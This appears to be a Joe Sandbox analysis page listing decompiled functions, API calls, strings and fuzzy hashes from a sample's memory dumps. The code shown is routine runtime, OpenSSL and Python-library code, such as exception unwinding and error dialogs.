Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
String ID: csm$csm
API String ID: 851805269-3733052814
Opcode ID: 636783574853e9e9a3fb0730e5a08b6ac18183820e0ce6080361bfa48fa937f4
Instruction ID: 5a19739b57951671574e95ecf06ce7e6fdd3bdc19f8b9e2c6cb3877583a7ebf1
Opcode Fuzzy Hash: 636783574853e9e9a3fb0730e5a08b6ac18183820e0ce6080361bfa48fa937f4
Instruction Fuzzy Hash: AC619D329087828AFF21AF21944426CBBA1FB54B94FD84172DE8D47B96DF3CE460C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DC808 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00007FF77FF7DA8DC808(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t113;
				void* _t118;
				void* _t130;
				long long _t133;
				intOrPtr* _t135;
				signed long long _t144;
				void* _t150;
				signed long long _t154;
				void* _t156;
				long long _t158;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				signed long long _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;

				_t130 = __rax;
				 *((long long*)(_t161 + 8)) = __rbx;
				 *((long long*)(_t161 + 0x10)) = _t158;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t162 = _t161 - 0x40;
				_t159 = __rcx;
				_t181 = __r9;
				_t174 = __rdx;
				E00007FF77FF7DA8DCC24(_t76, __r8);
				_t171 =  *((intOrPtr*)(__r9 + 8));
				_t135 =  *((intOrPtr*)(__r9 + 0x38));
				_t178 =  *__r9 - _t171;
				_t103 =  *((intOrPtr*)(__r9 + 0x48));
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0xda8dc930;
				 *((long long*)(_t162 + 0x30)) = __rcx;
				 *((long long*)(_t162 + 0x38)) = __r8;
				if (_t103 -  *_t135 >= 0) goto 0xda8dc9dc;
				_t154 = __r8 + __r8;
				if (_t178 - _t130 < 0) goto 0xda8dc922;
				if (_t178 - _t130 >= 0) goto 0xda8dc922;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0xda8dc922;
				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0xda8dc8ae;
				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
				if (_t113 < 0) goto 0xda8dc929;
				if (_t113 <= 0) goto 0xda8dc922;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0xda8dc8df;
				if ( *0xda9004c0 == 0) goto 0xda8dc8df;
				if (E00007FF77FF7DA8F8F10(_t130 + _t171, _t135, 0xda9004c0) == 0) goto 0xda8dc8df;
				_t83 =  *0xda9004c0();
				r8d = 1;
				_t84 = E00007FF77FF7DA8DCBF0(_t83, _t159 + _t171, _t174);
				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
				r9d =  *_t159;
				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t133 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t162 + 0x20)) = _t133;
				__imp__RtlUnwindEx();
				E00007FF77FF7DA8DCC20(_t84);
				goto 0xda8dc85e;
				goto 0xda8dc9e1;
				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
				goto 0xda8dc9d2;
				_t144 = _t174 + _t174;
				if (_t178 - _t133 < 0) goto 0xda8dc9d0;
				_t118 = _t178 - _t133;
				if (_t118 >= 0) goto 0xda8dc9d0;
				r10d =  *(_t159 + 4);
				r10d = r10d & 0x00000020;
				if (_t118 == 0) goto 0xda8dc9a5;
				r9d = 0;
				if (_t101 == 0) goto 0xda8dc9a0;
				r8d = r9d;
				_t166 = _t159 + _t159;
				if (_t156 - _t133 < 0) goto 0xda8dc998;
				if (_t156 - _t133 >= 0) goto 0xda8dc998;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0xda8dc998;
				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0xda8dc9a0;
				r9d = r9d + 1;
				if (r9d - _t101 < 0) goto 0xda8dc968;
				if (r9d != _t101) goto 0xda8dc9dc;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0xda8dc9b9;
				if (_t156 != _t133) goto 0xda8dc9d0;
				if (r10d != 0) goto 0xda8dc9dc;
				goto 0xda8dc9d0;
				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
				 *((long long*)(_t166 + _t171))();
				if (_t103 + 2 -  *_t135 < 0) goto 0xda8dc93c;
				return 1;
			}

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7DA8DC833
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7DA8DC8C8
RtlUnwindEx.KERNEL32 ref: 00007FF7DA8DC917

Strings

csm, xrefs: 00007FF7DA8DC8AE
f, xrefs: 00007FF7DA8DC846

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 7f3794147224920763e08c17acf18a5c560d4a612554ab5faf8e71f29923e20f
Instruction ID: d86f09aefdc4c76ecc180d5bff5aea34767b59c0ecd124acaf2e1c6840482ecd
Opcode Fuzzy Hash: 7f3794147224920763e08c17acf18a5c560d4a612554ab5faf8e71f29923e20f
Instruction Fuzzy Hash: 1951E472A096029EFF56EB25E400A2DB395FB40B88FD88172DE4E5374ADF38E8518714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD926D50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 129networkCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,00007FFCFD926503), ref: 00007FFCFD926D9D
getnameinfo.WS2_32 ref: 00007FFCFD926DEB
htons.WS2_32 ref: 00007FFCFD926E5B

Strings

..\s\crypto\bio\b_addr.c, xrefs: 00007FFCFD926E04, 00007FFCFD926E86, 00007FFCFD926EA5, 00007FFCFD926ED5, 00007FFCFD926EF2, 00007FFCFD926F14
, xrefs: 00007FFCFD926DD1

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: getnameinfohtonsmemset
String ID: $..\s\crypto\bio\b_addr.c
API String ID: 165288700-1606403076
Opcode ID: c8881a5d91007ccee32ef70399f1b096503745744d2b4d63f2f9801de5830693
Instruction ID: 8021bc4dda9c5d1b5425694f567625a9b1df56984008d95e1a466cfb2d09fc4c
Opcode Fuzzy Hash: c8881a5d91007ccee32ef70399f1b096503745744d2b4d63f2f9801de5830693
Instruction Fuzzy Hash: E651D531A186AA86FB209B51D0602B9F3A0EB40764F404035EBAE07AD5FF3DE955C7F4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D2240 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00007FF77FF7DA8D2240(void* __ebx, void* __rax, void* __rcx, void* __rdx, void* __r8) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed long long _t53;
				signed long long _t54;
				void* _t56;
				void* _t75;
				void* _t77;
				void* _t78;
				signed long long _t79;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;

				_t77 = _t78 - 0x20d0;
				E00007FF77FF7DA8DAD20(0x21d0, __rax, _t85, _t86);
				_t79 = _t78 - __rax;
				_t53 =  *0xda90d008; // 0xe3add53f52b8
				_t54 = _t53 ^ _t79;
				 *(_t77 + 0x20c0) = _t54;
				_t56 = __rcx;
				_t87 = __r8;
				_t75 = __rdx;
				GetModuleHandleW(??);
				r8d = 0x102;
				E00007FF77FF7DA8DC170();
				 *((intOrPtr*)(_t77 + 0x1fa0)) = 0x90cc0884;
				 *((long long*)(_t77 + 0x1fa4)) = _t77 + 0x1fb6;
				 *((short*)(_t77 + 0x1fb4)) = 0;
				 *((intOrPtr*)(_t77 + 0x1fac)) = 0xc80000;
				 *((intOrPtr*)(_t77 + 0x1fb0)) = 0x96;
				E00007FF77FF7DA8D2470(_t54, _t77 + 0x1fb6, __rdx, L"Unhandled exception in script", _t83);
				 *(_t79 + 0x38) = _t54;
				r8d = 0x2040;
				E00007FF77FF7DA8DC170();
				 *(_t79 + 0x30) = _t54;
				E00007FF77FF7DA8E5E94(_t54, _t56, _t56, _t54, _t77);
				 *(_t79 + 0x40) = _t54;
				E00007FF77FF7DA8E5E94(_t54, _t56, _t75, _t54, _t77);
				 *(_t79 + 0x48) = _t54;
				E00007FF77FF7DA8E5E94(_t54, _t56, _t87, _t54, _t77);
				 *(_t79 + 0x50) = _t54;
				r8d = 0;
				 *((long long*)(_t79 + 0x20)) = _t79 + 0x30;
				DialogBoxIndirectParamW(??, ??, ??, ??, ??);
				E00007FF77FF7DA8E3FEC(0,  *(_t79 + 0x40), _t77 + 0x1fa0, L"Unhandled exception in script");
				E00007FF77FF7DA8E3FEC(0,  *(_t79 + 0x48), _t77 + 0x1fa0, L"Unhandled exception in script");
				E00007FF77FF7DA8E3FEC(0,  *(_t79 + 0x50), _t77 + 0x1fa0, L"Unhandled exception in script");
				if ( *((intOrPtr*)(_t77 + 0x1f78)) == 0) goto 0xda8d2375;
				DeleteObject(??);
				if ( *((intOrPtr*)(_t77 + 0x1f80)) == 0) goto 0xda8d2387;
				DestroyIcon(??);
				return E00007FF77FF7DA8DACF0(__ebx, 0,  *(_t77 + 0x20c0) ^ _t79);
			}

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00007FF7DA8D242F), ref: 00007FF7DA8D2278
DialogBoxIndirectParamW.USER32 ref: 00007FF7DA8D233C
DeleteObject.GDI32 ref: 00007FF7DA8D236F
DestroyIcon.USER32 ref: 00007FF7DA8D2381

Strings

Unhandled exception in script, xrefs: 00007FF7DA8D22A8

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 78a4eda6ff4f3279ae2b51ce8934577bd0f30c98e0f1d87c80ea61d280b66d52
Instruction ID: f8043560eada4e58eb0451c7882d38c1470269d90229690d852bb8d0fe82ef41
Opcode Fuzzy Hash: 78a4eda6ff4f3279ae2b51ce8934577bd0f30c98e0f1d87c80ea61d280b66d52
Instruction Fuzzy Hash: 5D317A32A08A8289FB25EB61E8441EDA360FF88794FC40176EE4D4BA5ADF3CD655C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD744538 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD744571
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD744587

Strings

a unicode character, xrefs: 00007FFCFD74455C
argument, xrefs: 00007FFCFD744563
decomposition, xrefs: 00007FFCFD74456A

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Arg_ArgumentReadyUnicode_
String ID: a unicode character$argument$decomposition
API String ID: 1875788646-2471543666
Opcode ID: a080b61f372b97ddd36021a4b0696979c124d7943c3c3348c4d226086e0388bd
Instruction ID: d3656c8a3d2683f89ca0c4abc32704594e58794118646ce128706148184f219a
Opcode Fuzzy Hash: a080b61f372b97ddd36021a4b0696979c124d7943c3c3348c4d226086e0388bd
Instruction Fuzzy Hash: A221A550A08A2AC1FF654B16D4723799261AF46B9AF444536CA2D4A2CCEF6CD845E3F0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD7448F4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD74492D
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD744943

Strings

a unicode character, xrefs: 00007FFCFD744918
argument, xrefs: 00007FFCFD74491F
east_asian_width, xrefs: 00007FFCFD744926

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Arg_ArgumentReadyUnicode_
String ID: a unicode character$argument$east_asian_width
API String ID: 1875788646-3913127203
Opcode ID: e71a621fde4a066315d5ceca8de31c515b4bb48720bbad1bc05c4f42aedf660d
Instruction ID: 0b9b01ddf7157a596df498a776191a62236b2e58ee7734db5355d5a644b3d710
Opcode Fuzzy Hash: e71a621fde4a066315d5ceca8de31c515b4bb48720bbad1bc05c4f42aedf660d
Instruction Fuzzy Hash: 8221D261A08A2AC2FB658B16C47137992519F46B8AF444037CAAD4B2CCFF6DD845F3F0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D2620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00007FF77FF7DA8D2620(void* __eflags, void* __rax, long long __rcx, signed long long __rdx, long long __r8, long long __r9, long long _a8, signed long long _a16, char _a24, long long _a32, char _a1048, char _a2072, char _a4120, signed int _a6168, intOrPtr _a6224, char _a6232) {
				void* __rbx;
				void* __rsi;
				void* _t40;
				void* _t41;
				signed long long _t46;
				signed long long _t47;
				long long _t48;
				long long _t64;
				void* _t66;
				void* _t76;
				void* _t77;

				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				E00007FF77FF7DA8DAD20(0x1840, __rax, _t76, _t77);
				_t67 = _t66 - __rax;
				_t46 =  *0xda90d008; // 0xe3add53f52b8
				_t47 = _t46 ^ _t66 - __rax;
				_a6168 = _t47;
				_t64 = __rcx;
				E00007FF77FF7DA8D1040(GetLastError());
				_a16 =  &_a6232;
				r8d = 0x400;
				_a8 = 0;
				E00007FF77FF7DA8E3B34(_t40, _t41,  *_t47 | 0x00000002,  &_a1048, __r8, _a6224);
				E00007FF77FF7DA8D7420(_t24, _t47, __r8);
				_a16 = _t47;
				_a8 = _t64;
				E00007FF77FF7DA8D1B30(_t47,  &_a24,  &_a1048, "%s%s: %s",  &_a1048);
				r8d = 0x800;
				E00007FF77FF7DA8DC170();
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t47, _t48,  &_a4120,  &_a24,  &_a6232, "%s%s: %s");
				if (_t47 == 0) goto 0xda8d2734;
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t47, _t48,  &_a2072, "Fatal error detected",  &_a6232, "%s%s: %s");
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0xda8d274e;
				r9d = 0x30;
				return E00007FF77FF7DA8DACF0(MessageBoxA(??, ??, ??, ??), 0, _a6168 ^ _t67);
			}

APIs

GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7DA8D76B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D2654

Part of subcall function 00007FF7DA8D7420: GetLastError.KERNEL32(00000000,00007FF7DA8D26A0), ref: 00007FF7DA8D7447
Part of subcall function 00007FF7DA8D7420: FormatMessageW.KERNEL32(00000000,00007FF7DA8D26A0), ref: 00007FF7DA8D7476

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

MessageBoxW.USER32 ref: 00007FF7DA8D272C
MessageBoxA.USER32 ref: 00007FF7DA8D2748

Strings

Fatal error detected, xrefs: 00007FF7DA8D2700, 00007FF7DA8D273A
%s%s: %s, xrefs: 00007FF7DA8D26AD

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message$ErrorLast$ByteCharFormatMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 2806210788-2410924014
Opcode ID: be8159d4da1d623935737f66ca6ff985e81d9fc44c37ffb99e0b19b8c9617921
Instruction ID: 2d6a88e73cbd17366423fdfdf4cd0b623453e611bc7719bc5bcfe24b5d30b087
Opcode Fuzzy Hash: be8159d4da1d623935737f66ca6ff985e81d9fc44c37ffb99e0b19b8c9617921
Instruction Fuzzy Hash: E6317C72628A8291FB21AB10E4506EEE364FB84784FC44037EE8D02A9ADF3CD615CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD745148 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON310 ref: 00007FFCFD745174
_PyUnicode_ToNumeric.PYTHON310 ref: 00007FFCFD7451A7
PyErr_SetString.PYTHON310 ref: 00007FFCFD7451CF
PyFloat_FromDouble.PYTHON310 ref: 00007FFCFD7451E1

Strings

not a numeric character, xrefs: 00007FFCFD7451C5

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: DoubleErr_Float_FromNumericStringSubtypeType_Unicode_
String ID: not a numeric character
API String ID: 1034370217-2058156748
Opcode ID: a04d4ee890c6555e082b91d49744d7024a501f0aacbcd7dea3be52e51a61fffc
Instruction ID: 8ee5253783916c4b73b1259f7b945d0b5950cafeffab3bc185d86742ebd5ac21
Opcode Fuzzy Hash: a04d4ee890c6555e082b91d49744d7024a501f0aacbcd7dea3be52e51a61fffc
Instruction Fuzzy Hash: B1115121A1CD6AC1FB578B25D430039E361AF46B82F144132C93E0A6D8FF2CE845C2B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD7444A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON310 ref: 00007FFCFD7444CC
_PyUnicode_ToDecimalDigit.PYTHON310 ref: 00007FFCFD7444EB
PyErr_SetString.PYTHON310 ref: 00007FFCFD74450B
PyLong_FromLong.PYTHON310 ref: 00007FFCFD74451F

Strings

not a decimal, xrefs: 00007FFCFD744501

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: DecimalDigitErr_FromLongLong_StringSubtypeType_Unicode_
String ID: not a decimal
API String ID: 3750391552-3590249192
Opcode ID: 92c24eafb3dd3b61828cdddad90d28d2aa921282fbfd3c7b39e7b4b7c37f5353
Instruction ID: aa5491c99edc673f9023215db308b714dd9b5b5e870823057b3fb8331cabc060
Opcode Fuzzy Hash: 92c24eafb3dd3b61828cdddad90d28d2aa921282fbfd3c7b39e7b4b7c37f5353
Instruction Fuzzy Hash: 78119821B08D6AC1EF564B16E42017DE3A1AF46B9AF044433C92E4B6DCEF6CE445D3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD7426B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PyMem_Malloc.PYTHON310(?,?,00000000,00007FFCFD7425F5), ref: 00007FFCFD7426BB
PyCapsule_New.PYTHON310(?,?,00000000,00007FFCFD7425F5), ref: 00007FFCFD7426F8
PyErr_NoMemory.PYTHON310(?,?,00000000,00007FFCFD7425F5), ref: 00007FFCFD743F94
PyMem_Free.PYTHON310(?,?,00000000,00007FFCFD7425F5), ref: 00007FFCFD743FA4

Strings

unicodedata._ucnhash_CAPI, xrefs: 00007FFCFD7426ED

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
